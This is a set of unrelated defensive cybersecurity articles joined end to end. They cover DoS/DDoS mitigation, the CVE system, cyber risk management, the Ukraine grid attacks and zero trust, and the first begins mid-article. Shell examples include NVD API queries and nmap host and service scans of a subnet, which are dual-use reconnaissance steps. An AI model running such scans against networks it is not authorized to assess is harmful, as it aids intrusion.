Tracing the Attackers One of the most daunting tasks in the aftermath of a DDoS attack is tracing the attackers. With multiple compromised devices contributing to the malicious traffic, pinpointing the origin of the attack becomes a herculean task. The process of IP traceback is complicated by the sheer number of bots involved, each potentially masking the true source of the assault. Attackers often use controllers or proxies to command and control their botnets, sending encrypted or obfuscated messages to complicate the tracing process. This starkly contrasts with a DoS attack, which, originating from a single location or internet connection, is naturally easier to detect and neutralise on the target server. Strategies to Mitigate and Respond to DoS Attacks Arming oneself with knowledge of DoS attack tactics is only the first step; developing strategies to mitigate and respond to these attacks is essential for maintaining online fortifications. Here are some strategies to consider: By implementing these strategies, services can be prepared to withstand increased traffic, reduce the service attack surface, and protect against potential service attacks. In the heat of an attack, swift and effective measures are paramount. Utilising external services for upstream filtering can act as a shield, pre-screening incoming traffic to ward off potential threats. Developing a DDoS Response Playbook ensures a coordinated response during an attack and implementing temporary measures can help conserve resources and manage the situation. Implementing Network Safeguards Setting up network safeguards is comparable to building digital fortifications against an encroaching foe. Firewalls and routers, when configured with robust ingress and egress filtering practices, can prevent devices from becoming unwitting soldiers in a botnet army and block traffic from known malicious sources. Rate-limiting, employed at both hardware and software levels, acts as a regulator for the volume of traffic or the number of requests, allowing for measures such as traffic shaping and deep packet inspection to maintain order within the network. In the fight against ping of death attacks, configuring network devices to resist oversized packet reassembly prevents potential buffer overflows, enforcing a maximum size constraint to safeguard the network’s integrity. Moreover, meticulous logging of all changes made during an attack is crucial for post-incident recovery, ensuring systems can be reverted to their known stable state once the digital storm has passed. Deploying Advanced Security Solutions In today’s digitally connected world, advanced security solutions are the vanguard in the battle against DoS attacks. For instance, DDoS protection solutions can shield the connection table from SYN flood attacks by intercepting the flood of attacker’s requests, thus preserving the server’s capacity to handle legitimate connections. Smurf attacks, which exploit network broadcasts, can be mitigated by disabling IP broadcast addressing and utilising services like Cloudflare to filter out the malicious traffic before it wreaks havoc on the server. Modern devices have largely outgrown the susceptibility to traditional ping of death attacks, yet protection services ensure even legacy equipment remains secure by dropping malformed packets. Mitigation techniques for slow POST attacks include enforcing data receipt timeouts and leveraging DDoS protection services for swift detection and blocking. 
Preparing for the Worst: DoS Attack Response Planning

When the digital skies darken with the threat of a DoS attack, a robust incident response plan is the beacon that guides an organisation through the storm. The plan should include strategies for maintaining service continuity, even in a degraded mode, while under attack, ensuring a graceful rather than catastrophic reduction in service. Combining detection, traffic classification, and response tools, the response plan becomes a comprehensive shield against the onslaught of DoS attacks.

The effectiveness of a response plan is determined by its meticulous preparation and execution. A well-prepared plan is essential for rapid recovery, reducing the duration and impact of an attack and sustaining the organisation's operations amid cyber adversity. By crafting and regularly updating a response plan that addresses detection, mitigation, and communication, businesses can stand resilient in the face of these digital disruptions.

Incident Detection and Analysis

In the event of a DoS attack, effective incident detection and analysis are the first lines of defence. Speed and accuracy in identifying a DDoS attack are critical, and out-of-band detection methods using traffic flow records from protocols such as NetFlow and sFlow play a pivotal role in pinpointing the assault. Big data technology and cloud resources enhance the scalability and accuracy of DDoS detection systems, making them formidable adversaries to the stealthy and complex nature of these attacks.

Application layer analysis is particularly adept at monitoring request progress and identifying anomalies indicative of an attack. By keeping an eye on key completion indicators, it's possible to spot the subtle signs of an incipient DoS attack before it fully unfolds. And while the symptoms often resemble common network problems, a discerning analysis can distinguish between benign issues and malicious actions, preventing significant attacks from being dismissed as mere connectivity hiccups.

Communication and Recovery Protocols

During a DoS attack, clear communication and recovery protocols form the backbone of an organisation's response efforts. Internally, timely communication across departments ensures that everyone is aligned and working cohesively to combat the attack. Externally, transparency with customers regarding the impact and expected resolution times is vital for maintaining trust and managing expectations.

Using multiple communication channels ensures that critical information reaches all affected parties, even if the attack disrupts the regular channels. Establishing alternative methods, such as social media, can keep users updated on the state of services and guide them towards alternative access points when the primary channels are compromised.
We've navigated the treacherous waters of DoS attacks, exploring their intricate mechanics, the motivations behind them, and the methods for identifying and repelling these digital assaults. The journey has revealed that the key to withstanding such attacks lies in understanding their nature, staying vigilant for signs of trouble, and being prepared with robust defence and response strategies.

Remember, the realm of cybersecurity is ever-evolving, and so too are the threats that lurk within it. By arming ourselves with knowledge and leveraging the right tools and techniques, we can build a formidable defence against DoS attacks, ensuring the resilience and continuity of our digital services. Let this narrative serve as a guidepost on your path to cybersecurity preparedness, inspiring you to remain ever vigilant and proactive in the digital age.

Frequently Asked Questions

What are the 4 types of DoS attacks?
The four types of DoS attacks are Distributed DoS, Application Layer attacks, Advanced Persistent DoS, and Denial-of-Service as a service. These attacks flood the bandwidth or resources of a targeted system, exploit vulnerabilities, and persistently disrupt the target's services.

What are the most common denial of service attacks?
The most common denial of service attacks include flooding attacks, which send more traffic to a network address than the system can handle, and buffer overflow attacks, which exploit bugs specific to certain applications or networks.

What does a DDoS attack do?
A DDoS attack floods a server with traffic to overwhelm its infrastructure, causing a site to slow down or even crash. This prevents legitimate traffic from reaching the site and can seriously harm an online business.

What is a denial of service attack, with an example?
A denial of service attack is when an attacker purposefully tries to exhaust a system's resources, denying legitimate users access. Legitimate overload can produce the same effect: a surge of shoppers during Black Friday sales can make a site just as unavailable.

What exactly is a DoS attack?
A DoS attack is a cyber threat that disrupts services and prevents legitimate users from accessing a machine or network resource.
What Is CVE in Cyber Security

Cybersecurity is an ever-evolving landscape in which defenders and attackers continually strive to outmaneuver each other. With our growing reliance on digital technology and an ever-increasing number of cyber threats, staying updated on potential vulnerabilities has become paramount. This is where the question "What is CVE in cyber security?" arises. Common Vulnerabilities and Exposures, or CVE, is a crucial part of this dynamic and plays a significant role in managing cybersecurity risks.

CVE is a catalog of publicly disclosed cybersecurity flaws. Each CVE entry is identified by a unique identifier, a description, and public references. Businesses must understand CVE's role in cybersecurity in today's digital world: it helps them understand and mitigate risks to their digital infrastructure and enables data sharing across vulnerability databases. Below we discuss its history, its role in cybersecurity, how it works, and why businesses need it in the digital age. CVE helps stakeholders comprehend, respond to, and prevent cybersecurity threats, and any organization that wants to strengthen its digital defenses and navigate the complex landscape of cybersecurity risks must be familiar with the CVE system.

What Is CVE?

The Common Vulnerabilities and Exposures (CVE) list is a free, publicly available catalog of cybersecurity vulnerabilities and exposures. Each vulnerability or exposure on the CVE list has a CVE ID and a brief description. This system simplifies data sharing and vulnerability identification, improving platform and system security.

The CVE system categorizes and tracks vulnerabilities while avoiding duplication. Because organizations and security vendors can all use the same CVE ID, vulnerability detection, reporting, and patching become simpler, and vulnerability management becomes more consistent. CVE entries create a baseline for identifying vulnerabilities, allow them to be prioritized by risk and impact, and point to information on how to fix them. This standardized approach makes it easier for organizations to share vulnerabilities, mitigation strategies, and patches, improving cybersecurity overall.

The non-profit MITRE Corporation manages the CVE program, which is funded by the US Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA). This collaboration emphasizes CVE's critical role in strengthening the country's cyber defense capabilities.

The Structure of a CVE Identifier

A CVE identifier is a unique string that refers to a specific vulnerability or exposure in the CVE list. It comprises the CVE prefix, a year, and a unique number. "CVE" stands for "Common Vulnerabilities and Exposures"; this prefix is consistent across all entries and distinguishes CVE identifiers from other types of identifiers or codes.

The year in the identifier corresponds to the year the CVE ID was assigned. Note that this is not necessarily the year the vulnerability was discovered, introduced, or fixed; it simply marks when the vulnerability received its CVE ID. Finally, the unique number is a string of digits that identifies each entry; it is assigned in sequence to each new vulnerability recorded within a given year.
For example, in the identifier CVE-2021-12345, 'CVE' is the prefix, '2021' indicates the year the vulnerability was assigned the CVE ID, and '12345' is the unique number assigned to the vulnerability for that year. This standardization allows vulnerabilities to be tracked, shared, and discussed consistently across different systems and platforms, enhancing the overall cybersecurity posture.

The Importance of CVE in Cyber Security

The CVE system benefits both organizations and security professionals. By standardizing vulnerability identifiers and descriptions, CVE reduces confusion and improves vulnerability communication within and among organizations, vendors, and other parties.

CVE data helps businesses prioritize vulnerability remediation. Understanding a vulnerability's impact and the systems it affects allows businesses to rank vulnerabilities, and CVE descriptions frequently include links to additional information such as exploit methods or patches. This enables organizations to plan security measures and remediation strategically, improving their security posture.

CVE also promotes information sharing within the cybersecurity community. With a common vulnerability language, organizations, security vendors, researchers, and governments can address cybersecurity threats together, and new vulnerabilities are handled more quickly because there is no need to reconcile different naming systems or descriptions. It also promotes cybersecurity tools and services that are cross-platform and vendor-agnostic. In today's cybersecurity landscape, the CVE system is critical for a coordinated, global response to threats.

CVE in Risk Management and Compliance

CVE data can help organizations identify and prioritize vulnerabilities based on their impact. Understanding a vulnerability, its potential consequences, and the systems it may affect helps organizations decide which vulnerabilities pose the greatest risk to their operations and require immediate attention. CVE data can also inform broader risk management strategies, such as patching vulnerable software, applying workarounds, and monitoring for exploitation. By incorporating CVE data into their risk management practices, organizations can better manage cybersecurity risks and reduce their exposure to cyber-attacks.

The CVE system also supports regulatory and industry compliance. Standards such as PCI DSS and HIPAA require organizations to manage vulnerabilities and secure their networks and systems. PCI DSS, for example, requires organizations that handle cardholder data to install vendor-supplied security patches to keep systems and applications secure; CVE data helps them identify the relevant vulnerabilities and patch them. HIPAA, in turn, mandates risk assessments to identify threats to the confidentiality, integrity, and availability of electronic protected health information, and CVE data aids in identifying the vulnerabilities those assessments must consider.

How to Leverage CVE Data

Keeping up with new CVE entries, and reviewing old ones, is essential for cybersecurity. Awareness of new and evolving vulnerabilities helps organizations mitigate risks and respond to threats; failure to stay informed can leave an organization exposed to cyberattacks. There are numerous resources for tracking CVEs. Chief among them is the National Vulnerability Database (NVD), the US government repository of standards-based vulnerability management data.
Using the Security Content Automation Protocol (SCAP), the NVD represents security checklist references, software flaws, misconfigurations, product names, and impact metrics. The NVD supplements the CVE list by describing the impact, exploitability, and available patches for each vulnerability.

CVE tracking also relies on vendor security advisories. Most software vendors issue vulnerability advisories regularly, and the CVE IDs in these advisories help organizations track vulnerabilities in their software stack. Many mailing lists and cybersecurity websites also keep CVEs and other security news current; MITRE, the organization in charge of the CVE program, maintains a mailing list for CVE announcements. Monitoring these resources and feeding the data into vulnerability management and risk assessment enables organizations to respond to emerging threats proactively, protecting their systems and data from cyberattacks.

Integrating CVE Data into Security Tools

Integrating CVE data into vulnerability management tools automates and improves cybersecurity. These tools, including vulnerability scanners and patch management systems, can find and fix vulnerabilities using CVE data.

Vulnerability scanners check systems against CVE identifiers. They can be configured to run at regular intervals or in real time, providing a continuous cybersecurity assessment: they compare the scanned system data to CVE databases, identify vulnerabilities, and produce a detailed report on their potential impact. Patch management systems, on the other hand, update all systems in a company to address known vulnerabilities. With CVE data integrated, these systems can identify the patch for a specific vulnerability and prioritize patches by severity, automating system maintenance for the organization.

By automating vulnerability assessment and remediation, CVE data helps organizations improve their cyber risk management. It enables rapid identification and remediation of vulnerabilities, reducing the attacker's window of opportunity, and it reduces manual intervention and human error, freeing up resources for other tasks.

Managed IT Support Services and CVE

Managed IT service providers, particularly those specializing in cybersecurity and vulnerability management, can help businesses use CVE data and address vulnerabilities. They can manage security patches, monitor new CVE entries, and improve an organization's overall cybersecurity.

Managed IT support providers monitor CVE databases and other security advisories for new vulnerabilities and, drawing on their expertise, assess the resulting risk to a company's IT environment. They can also rank vulnerabilities by severity and business impact, a process that can be difficult and time-consuming for organizations without dedicated cybersecurity personnel, ensuring that the most critical vulnerabilities are addressed first. Providers can assist with patching and other mitigation as well: automating patch management, testing patches before deployment to avoid business disruption, and verifying patch installation. Finally, they can use CVE data as part of a vulnerability management strategy to ensure compliance with cybersecurity industry standards and regulations.
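For the monitoring workflow described above, the NVD also exposes a JSON API that can be scripted. A hedged sketch using curl and jq (the endpoint and response paths reflect NVD's v2.0 API at the time of writing and may change; CVE-2021-44228, Log4Shell, is used only as a well-known example):

# Fetch a single CVE record from the NVD
curl -s "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2021-44228" > cve.json

# Extract the English description and the CVSS v3.1 base score
jq -r '.vulnerabilities[0].cve.descriptions[0].value' cve.json
jq -r '.vulnerabilities[0].cve.metrics.cvssMetricV31[0].cvssData.baseScore' cve.json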
Tips for Strengthening Your Organization's Cyber Security Posture

Improving the overall cybersecurity posture of a business requires a proactive, strategic approach to identifying, assessing, and mitigating vulnerabilities. CVE data provides a wealth of information businesses can draw on in their cybersecurity initiatives. Here are some practical tips on how to use CVE data effectively:

- Regularly Review CVE Data and Keep Security Teams Informed: Ensure your security teams regularly review CVE data, including not just newly released vulnerabilities but also updates to existing ones. The cybersecurity landscape is constantly evolving, and staying informed allows teams to respond quickly to new vulnerabilities that could impact your systems.

- Prioritize Vulnerabilities Based on Their Potential Impact and Exploitability: Not all vulnerabilities pose the same level of risk to every organization. Prioritize remediation based on the potential impact of a vulnerability on your specific systems and on how easily it can be exploited. The Common Vulnerability Scoring System (CVSS), a companion to the CVE system, is a useful tool here, providing standardized scores that reflect the severity of vulnerabilities.

- Develop a Vulnerability Management Process That Incorporates CVE Information: A formal, structured vulnerability management process helps ensure consistent and effective use of CVE data. It should include monitoring new vulnerabilities, assessing their relevance and potential impact on your organization, implementing mitigation measures, and verifying their effectiveness.

- Invest in Employee Training and Awareness Programs Related to Cybersecurity: Employees are often the first line of defense against cyber threats. Regular training helps them understand the importance of CVE data and how it is used, and awareness programs keep them informed about the latest threat trends and safe online practices, fostering a culture of cybersecurity within the organization.

- Consider Partnering with a Managed IT Support Service Provider with Expertise in Cybersecurity and Vulnerability Management: If your organization lacks the necessary resources or expertise, a managed IT support provider can be a highly effective option, managing your cybersecurity initiatives from monitoring CVE data and implementing patches to ensuring compliance with industry regulations.

Strengthening Your Security with CVE Knowledge

The Common Vulnerabilities and Exposures (CVE) system enhances an organization's cybersecurity posture. By providing standardized identifiers for known vulnerabilities, CVE helps businesses identify, prioritize, and remediate potential threats. Regularly reviewing CVE data, incorporating it into vulnerability management processes, and staying informed about new entries are crucial to maintaining robust cybersecurity defenses.

At Computronix, we provide a range of resources to help you stay informed and manage your cybersecurity risks effectively. Whether you're interested in the latest in vulnerability management, want to train your team on cybersecurity best practices, or are exploring the advantages of partnering with a managed IT support provider, we have the resources and advanced security tools to assist you.
Our team of experts has the knowledge and experience to help you navigate the ever-evolving landscape of cyber threats and protect your valuable digital assets. Don't leave your cybersecurity to chance: leverage the power of CVE and Computronix's expertise to safeguard your organization. Contact Computronix today for more information about our services, and let us help you fortify your digital defenses. Reach out to us at: 1 (475) 275-4393.
Cyberattacks are a common threat to nearly every organization today. Dangers that were once relevant only to a limited number of industries now threaten most organizations across the board. As more organizations come to rely on cyberinfrastructure, the risk of a security breach becomes more threatening, and the costs of experiencing an attack increase.

Organizations collect vast amounts of data and store them throughout their digital environment. While a broad cyber network is essential for regular business operations, a wider network also opens the door to vulnerabilities that hackers and other criminals can exploit. At the same time, a growing market for stolen data creates a tempting incentive for cybercriminals.

Despite the risk and growing investment in security solutions, cyberattacks still present a serious issue. A cyberattack costs organizations an average of $4.24 million, not counting indirect costs such as reputation and brand damage. The number of cyberattacks continues to increase, with a University of Maryland study showing that, on average, an attack occurs every 39 seconds. With this sobering statistic in mind, it's not surprising that organizations are prepared to do whatever they can to prevent attacks and keep their data safe.

Despite the best of intentions, cyber risk management can become overwhelming, and it is hard to know where to begin. In this post, we break down the essential information you need to know and take a look at:

- The definition of cyber risk
- Common forms of cyber risk
- What risks threaten organizations and how to identify them
- The legal requirements of cyber risk management
- How you can reduce cyber risk and manage risks with confidence
- Resources you can use on your cyber risk management journey

Keep reading to learn more about cyber risk and how you can prevent it from impacting your organization.

What Is Cyber Risk?

Cyber risk can be defined as the potential for an attack to expose an organization's data or cyber systems to a cybercriminal, or for external elements or circumstances to put that information or technology at risk of loss or damage. Risk implies the chance of a harmful event occurring, so cyber risks are the harmful events that threaten your organization's cyber landscape. These risks come in many shapes and sizes and can originate internally, from your systems and employees, or externally, from criminals. Some of the most common examples of cyber risk include:

Common Forms of Cyber Risk

1. Ransomware

Ransomware is a form of malware that encrypts computer data and blocks users from accessing it until they agree to pay the perpetrator a ransom. Ransoms are generally paid in digital currency, making it harder for law enforcement to track the money and apprehend the criminal.

2. Phishing Malware

Phishing malware is malware delivered through phishing techniques. Phishing is a form of cybercrime in which a target is contacted directly via text, telephone, or, most commonly, email by someone posing as a contact or legitimate institution, who attempts to trick the individual into downloading malware disguised as a legitimate attachment.

3. Insider Threats

Insider threats are exactly what they sound like – a danger that threatens an organization from within, such as through its employees.
This can be due to malice or negligence, but any insider with access to information can pose a risk, including current and former employees, contractors, and even business partners. The threat generally involves the sharing or exposure of sensitive information, but it can also include access to sensitive networks, sharing of trade secrets, security sabotage, or misconfiguration of networks that leads to data leaks.

4. Cyberattacks

'Cyberattack' is a broad term for any attempt to gain illegal or unlawful access to a device or network, especially for the purpose of causing damage or harm. This includes traditional hacking, phishing, malware, and the other techniques cybercriminals use to illegally access devices, networks, and information.

Cyber risk has far-reaching impacts on your organization, even outside your cyber operations, and beyond the downtime or halted operations needed to implement damage control protocols. The direct effects are often easy to spot and include the financial fallout of a breach: management expenses, legal fees, and regulatory fines (more on this later) set back general business goals and can even put some organizations at risk of bankruptcy. The indirect effects are harder to quantify but also affect your organization's general performance. These include loss of customer trust and damage to brand reputation, which can significantly harm your organization; the effect may dissipate within months or last for years, but either way it leaves a significant mark.

How to Identify Cyber Risks?

With cyber risk affecting all areas of business operations, recognizing and managing risk is critical. Here are a few techniques you can use to seek out and identify risks before they have the opportunity to damage your organization.

To determine your exposure, you first need to identify the assets you want to protect. This isn't as easy as it seems at first glance: you can't protect all your assets equally, so once you have identified your assets, you will also need to prioritize them for protection. Some questions you can use to identify high-priority assets include:

- What types of data does your organization store?
- Who does the data belong to?
- What are the consequences of losing the data?

The last question involves several considerations: how the data loss would affect the original owners, how it would affect the business's reputation, and, most importantly, whether it would result in legal action and the fines involved in failing to comply with data security regulations. Another vital factor is what would happen if the data were accessed in any way: what would the consequences be if the data were publicized, falsified, or made inaccessible? For a credit card number, any or all of these scenarios could be disastrous, but some types of information are sensitive to only one or two of these issues. Asking these questions helps determine which assets to prioritize for protection by showing the consequences that would result if the data were compromised.
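As a small illustration of the "what types of data do you store" question, simple pattern searches can flag files that may hold regulated data. A rough sketch (the path and the US social security number pattern are assumptions, and matching of this kind produces false positives that need manual review):

# List files under /srv/data containing strings shaped like US social security numbers
grep -rlE '[0-9]{3}-[0-9]{2}-[0-9]{4}' /srv/data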
The next step is to understand who might compromise the data. Another facet of recognizing cyber risks involves identifying the sources that may potentially harm the assets you've identified for protection. While there are explicit threats such as hacking, when considering what may threaten data it's essential to think outside the box, which includes considering environmental factors: flooding, for example, may cause hardware damage. Examine your situation and determine which environmental factors, if any, present a potential risk to your assets.

Business threats such as equipment failure may also put your data at risk, and, more tangentially, so may supply chains. Security professionals are growing increasingly aware of the dangers posed by suppliers who may take advantage of their connection to deliver malware to your system, whether accidentally through negligence or with malicious intent. Insider threats from current or former employees can also endanger data because of their unique insider access to your networks.

While not all of these threats are directly related to cybersecurity, acknowledging them and developing mitigation plans ensures that your data remains safe. Even within the realm of cybersecurity, it's important to distinguish between different threats, such as traditional hacking versus phishing. Understanding the risks to your data will help you build an effective defense against them.

Once you've identified the risks that threaten your assets, you have to analyze your cybersecurity environment and identify the weaknesses that may leave you vulnerable to those threats. It's not always easy to spot weaknesses or identify their origin. For example, how do you know if you are vulnerable to insider threats? Upsetting an employee in charge of sensitive data certainly increases your risk, but you can't be sure. You may also be made vulnerable by employees making mistakes inadvertently or through a lack of education and awareness: your employees may be using weak passwords or opening malicious attachments from emails that seem legitimate to the untrained eye.

Standards and Frameworks

In addition to the usual due diligence required to protect your organization's reputation and general assets, there are standards and frameworks that provide guidelines on how to manage cyber risk effectively. These include:

The NIST (National Institute of Standards and Technology) Framework for Improving Critical Infrastructure Cybersecurity, issued in 2014. The framework serves as a handy set of guidelines delineating steps organizations can take to protect themselves from cyberattacks. The guidelines aren't legal requirements but rather a recommended organizational approach to analyzing your security status and determining a course of action. The steps it delineates are:

- Identify assets and keep an up-to-date inventory
- Identify the risks your assets face
- Prioritize risks to make effective resource allocation decisions
- Develop a detailed protocol for prevention, detection, response, and recovery
- Develop current and future target profiles that describe assets, risks, and measures to prevent them
- Develop a detailed plan of action so that managers and administrators know how to respond to issues
- Update all of the above steps to keep up with organizational changes

Common Attack Pattern Enumerations and Classifications (CAPEC™), a publicly available catalog of the attack patterns cybercriminals commonly use to exploit vulnerabilities in applications, devices, and networks.
The catalog includes the protective measures most organizations take against cybercriminals and how attackers work around them. It examines design patterns in a destructive context by analyzing real-world examples of cyber exploitation and data breaches. Each pattern explains how an attack is executed, giving unique insight and guidance into how to mitigate it. This is especially beneficial for those developing applications or enhancing, adding, or administering cyber capabilities: by understanding the attack, they know what countermeasures to build into their programs to prevent it.

ISO maintains an international standard that sets out security risk assessment requirements. The compliance framework requires organizations to demonstrate proof of information security risk management, of the risk actions taken, and of whether the relevant controls have been applied. The standard takes a best-practice approach to security and considers all aspects involved, including the people, processes, and technology.

How to Reduce Cyber Risk?

While creating plans to resolve cyberattacks is a necessary precaution, it is better still to head off the risk before an attack has the chance to occur. That's why we're breaking down some of the best ways you can reduce the risk to your cyber assets.

Identify and prioritize assets

To begin reducing the risks your assets face, you first need to determine what needs protection. This means combing through your network and identifying any data that may be vulnerable to attack. A good test for at-risk data is to consider the consequences of losing it: if the consequences are severe, the data is more likely to be valuable and therefore tempting to cyber attackers. Where the data is stored and how it is accessed (including by whom) also helps identify data at risk. Once you have identified your highest-risk, highest-priority assets, you will have a clear idea of where to channel the majority of your security resources.

Identify potential cyber threats and vulnerabilities

The next step is to identify the threats that put your assets at risk. Identifying and learning about external threats is extremely important, but recognizing internal vulnerabilities is just as critical. One of the most common causes of internal vulnerability is employee ignorance and error; an IBM study revealed that human error is behind 23% of data breaches. Alternatively, breaches can be due to weaknesses in your supply chain or simply inherent to your code. Educating employees can help mitigate the risk of error, and employees can also help identify risks within the system.

External threats can also be extreme: convincing phishing attacks or powerful malware injections can result in your network being breached. Once again, employee education can help mitigate the issue by teaching employees which emails and risks to avoid and helping them spot suspicious activity.

Analyze existing security controls and where the gaps are

However much time, energy, and money you invest in your organization's cybersecurity measures, no system is foolproof, and analyzing existing infrastructure can reveal gaps or previously overlooked vulnerabilities. Using a security framework such as those mentioned above as a guideline can help identify where your system is up to scratch and where there is still room for improvement. Evaluating the people and technologies involved in your security process can also uncover previously unsuspected vulnerabilities. Lastly, and most critically, gather and analyze the data from your system, as even the smallest anomalies could indicate a larger issue.
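A gap analysis of this kind often starts by simply rediscovering what is on the network, since unknown hosts and unexpected open services are gaps by definition. A minimal sketch with nmap (the address range is an assumption, and you should only scan networks you are authorized to assess):

# Ping sweep: which hosts are alive on the subnet?
nmap -sn 192.168.1.0/24

# Service and version scan of a single host, to spot unexpected or outdated services
nmap -sV 192.168.1.10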
Evaluating the people and technologies involved in your security process can also uncover previously unsuspected vulnerabilities. Lastly, the most critical step is to gather and analyze the data from your system, as even the most minor anomalies could indicate a more significant issue.
Implement policies, tools, and procedures
At this point in the process, you can once again use the frameworks mentioned above to help create mitigation policies to prevent cyber risk and attacks. Putting policies in place doesn't only mean creating a strategy to implement in the event of a cyberattack but also deciding what steps to take when a vulnerability or potential risk is spotted to prevent the danger from evolving into a full-blown breach. Other steps you can take to stop attacks include implementing security tools that scan your network and notify you of vulnerabilities, risks, or unusual activity that may indicate an attack.
Continuously monitor for new risks
Even if you feel your network is entirely secure now, hackers and other cybercriminals are constantly evolving their techniques to keep up with increasingly powerful security measures. Additionally, cybercriminals are well-known for adopting new technology early and using it for nefarious purposes. For example, hackers are already using AI capabilities to conduct more sophisticated phishing attacks. In light of these facts, complacency is never an option, and it is essential to remain continually aware and constantly monitor your system. Constant monitoring is an unrealistic expectation for a human team, so implementing monitoring tools that alert you to the presence of risks can help ensure you're constantly on top of your organization's security situation.
Resources for Managing Cyber Risk
Want to learn more about managing cyber risks? Here are a few resources you can use to put your risk management plan into action:
Top 12 Cyber Risk Management Platforms
Monitoring and managing the constant threats that loom over your cyber landscape is overwhelming, exhausting, and close to impossible. Utilizing technological solutions and platforms that automatically monitor your network, identify risks, and alert you to danger allows you to mitigate cyber risks before they become cyberattacks, and may even spot risks that could slip under your radar. Thanks to growing demand, hundreds of platforms are available on the market. While this means you have a wide range of options and can find a platform that perfectly meets your organization's needs, sifting through hundreds of platforms can become overwhelming. We broke it down into a short and easily digestible list of the best platforms available on the market today.
Cyber Security Risk Assessment Template [XLS download]
Assessing the risks your assets face is critical to building a mitigation and prevention strategy. But knowing where to begin combing your network for threats and vulnerabilities can be extremely challenging. While existing frameworks can help you understand the risks your organization faces and how to address them, they still don't offer a guideline on how to conduct an effective assessment of your own network. In this download, we give you a clear and concise template that shows precisely how a risk assessment should be done.
What Is Cyber Supply Chain Risk Assessment and Why You Should Care
Most people are familiar with analyzing their own networks for risks and vulnerabilities.
However, recently, the cybersecurity community has begun to take notice of a new avenue of threats that can be used to access your network and devices – third-party suppliers. Suppliers can, whether intentionally or through negligence, allow malware, spyware, or outside actors to access your network by taking advantage of their unique access to your assets. Keeping track of suppliers can be complex, and threats can hide even deeper within the supply chain. For example, they may come from your suppliers' suppliers. With risks continuing to appear from new and unexpected sources, monitoring and assessing your supply chain is more critical than ever before.
Manage Your Cyber Risks With Confidence
This guide introduces some of the most critical concepts that act as essential building blocks in your cyber risk management plans. In summary, here are a few proactive steps you can take to implement an effective cyber risk management plan:
- Scan your network and devices to identify your assets
- Keep an up-to-date catalog of your assets and prioritize their protection by vulnerability (a minimal scoring sketch follows below)
- Educate employees on cyber risks with security awareness training
- Analyze your network for existing vulnerabilities and potential threats
- Identify the threats that put your assets at risk and learn how they operate
- Determine your organization's legal privacy requirements and ensure compliance with regulatory frameworks
- Implement the tools, procedures, and processes necessary to protect against attack
- Continue to monitor your cyber landscape for vulnerabilities and continue enhancing and upgrading your risk assessment strategy
Implement these techniques and watch your security standard soar as attacks, breaches, and suspicious behavior decrease, leaving your assets secure and untouched. Explore CybeReady's platform to learn how you can involve your whole team in your cyber risk management strategy.
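To make the prioritization step concrete, here is a minimal, hypothetical sketch in Python. The assets and scores are invented for illustration, not a real scoring methodology; the common heuristic shown is risk = likelihood x impact.

```python
# Toy risk register: names and scores are illustrative placeholders.
assets = [
    {"name": "customer database", "likelihood": 4, "impact": 5},
    {"name": "public website", "likelihood": 3, "impact": 3},
    {"name": "hr laptop fleet", "likelihood": 5, "impact": 2},
]

# Score each asset: risk = likelihood x impact.
for asset in assets:
    asset["risk"] = asset["likelihood"] * asset["impact"]

# Channel the majority of security resources toward the top of this list.
for asset in sorted(assets, key=lambda a: a["risk"], reverse=True):
    print(f"{asset['name']}: risk score {asset['risk']}")
```

Real frameworks weigh many more factors (exploitability, exposure, compensating controls), but the ranking idea is the same.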
In December 2015 and 2016, there were two blackouts in Ukraine that caused hundreds of thousands of Ukrainians to endure the notoriously cold eastern winter without power for a few hours. At first, this wasn't an alarming event, as blackouts can happen anywhere and anytime. However, the scale of it made people suspicious. Later it turned out that both blackouts were caused by cyber-attacks coming from Russia. Makes you think of Ian Fleming's James Bond title "From Russia with Love," am I right? But why is it important? Why can we say that it is a milestone in the world of cyber-terrorism? Hackers can be found in every part of the world, in almost every country, so what makes this attack so special? Read on for the answer. Some predicted that hacking would eventually "transcend" into the real, physical world. It would break the boundaries of cyberspace and evolve into something that can have an impact outside of its walls. This is what happened in Ukraine with the blackouts. A forerunner of it was the Stuxnet attack, which ruined almost one-fifth of Iran's nuclear centrifuges in 2009. In both cases, the virus (or worm) caused physical damage, and not just in the computers. This new era of cyber warfare is so threatening that Michael Hayden, the former director of the NSA and the CIA, said "This has a whiff of August 1945. Somebody just used a new weapon, and this weapon will not be put back in the box." We all know what that weapon Hayden talks about was in 1945. If the former head of the CIA compares this new type of hacking to the A-bombs, then we can be sure that this thing is serious. According to a few speculations, the current state of events can be seen as a "new Cold War". The Russians want to show their dominance, and the attacks in Ukraine were just show-offs of their cyber power. Sadly, this means that, for them, Ukraine is nothing but a testing ground, a new Manhattan Project in the 21st century. For further details on the attacks and the things going on in the background, please read the cited articles.
Zero trust security is a concept developed by John Kindervag and Forrester Research Inc. in 2009 (Forrester). Also called zero trust network architecture, the idea of zero trust security is a diametrically opposed view of the conventional "perimeter-based" architecture of security over the last twenty to thirty years. With recent identity breaches, vendors and analysts are wondering whether a zero trust security model could work to prevent compromises.
Early Network Security
Kindervag describes traditional network security models as being akin to ". . . an M&M, with a hard crunchy outside and a soft chewy center" (Forrester). IT organizations would create a perimeter "fortress" around their network and then create layers of security so that hackers would struggle to get through them. The core of the network would have the most critical assets—data, applications, and identities—and, in theory, the defense-in-depth approach made them difficult to reach from a hacker's perspective. This approach to security involves implicitly placing trust in not only the perimeter layers, but also users who operate inside of the core of the network.
The Advent of Zero Trust Security
In the modern era, however, bad actors are everywhere, and the traditional method of security leaves something to be desired, as more and more hackers have started attacking networks from both inside and out. A NIST report on Forrester's development of the zero trust security model charted the most common sources of security breaches from 2011-12: almost 50% of those attacks originated from inside an organization, while only about 25% were headed by external sources. In other words, in today's world, more security threats come from inside an organization. So, does the traditional, perimeter-based security model still work? If a network is an M&M, it's clear that the "hard outer shell" isn't doing its job to protect the "chewy center." But the zero trust security model doesn't rely on a hard outer shell. The mindset behind zero trust security is to regard all sources of network traffic, both external and internal, as potential attack vectors. Therefore, all users and resources must be verified and authenticated, system data must be collected and analyzed, and network access and traffic must be limited and monitored. While it may seem a bit paranoid, zero trust security is rooted in the realities of the cloud computing age. Instead of an M&M, the perimeter-less approach to networks more closely resembles a hard candy: equally resilient from perimeter to core.
Modern Information Security
